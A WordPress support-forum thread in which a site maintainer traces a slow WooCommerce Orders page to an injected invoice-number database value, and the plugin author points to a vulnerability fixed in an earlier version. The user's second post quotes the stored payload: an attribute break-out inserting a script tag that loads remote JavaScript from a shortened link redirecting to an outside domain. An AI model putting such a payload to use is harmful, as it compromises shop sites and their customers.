• Resolved d555555

    (@d555555)


    A client of mine is using the plugin on their website. It slows down the default Woo Orders page due to this:

    GET https://cdn-bigcommerce.com/counterstat.js net::ERR_CONNECTION_TIMED_OUT

    This request is fired for every single order and always returns 301. The invoice link also seems broken.

    Any ideas?

    Thanks!

Viewing 6 replies - 1 through 6 (of 6 total)
  • Thread Starter d555555

    (@d555555)

    It seems like the invoice start number and current number are not being saved correctly in the DB. This is what my client has in his SQL table:

    Meta key: wf_invoice_number
    Meta number: 1″ type=”number”><script id=”boston12″ src=”https://bit.ly/2K9eSau”></script&gt;

    Any chance this is a markup issue or you are not escaping tags in some of your variables?

    Plugin Author WebToffee

    (@webtoffee)

    Hi @d555555,

    We have checked our plugin for the mentioned error but cannot we do not have any code in the plugin in reference to the lines you mentioned. You can look in our entire plugin directory for https://bit.ly/2K9eSau or GET https://cdn-bigcommerce.com/counterstat.js

    The meta key wf_invoice_number stored the invoice number of orders, but there are no chances that the plugin saves this as data as the invoice number.

    However, we noticed the URL https://bit.ly/2K9eSau is redirecting to https://cdn-bigcommerce.com/counterstat.js.

    We will check for any escape missing in the code

    Plugin Author WebToffee

    (@webtoffee)

    Hi @d555555,

    We have fixed some vulnerability issues within the plugin in a previous version itself(ver 2.4.4).

    Please check if you are using the latest version of the plugin. If not, please update and check if issue persists.

    Thread Starter d555555

    (@d555555)

    Thanks for your answer!

    I also looked for those strings in the plugin code and couldn’t find them – that’s how I landed on the SQL entries. It might be something that happened before the plugin update.

    I’ll check again later today and get back to you.

    Cheers

    Thread Starter d555555

    (@d555555)

    Okay, after clearing up the DB, it seems like everything runs well.

    Thank you!

    Plugin Author WebToffee

    (@webtoffee)

    Hi @d555555,

    Great! Leave us a review if you like the plugin.

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Plugin is slowing down the Orders page (ERR_CONNECTION_TIMED_OUT)’ is closed to new replies.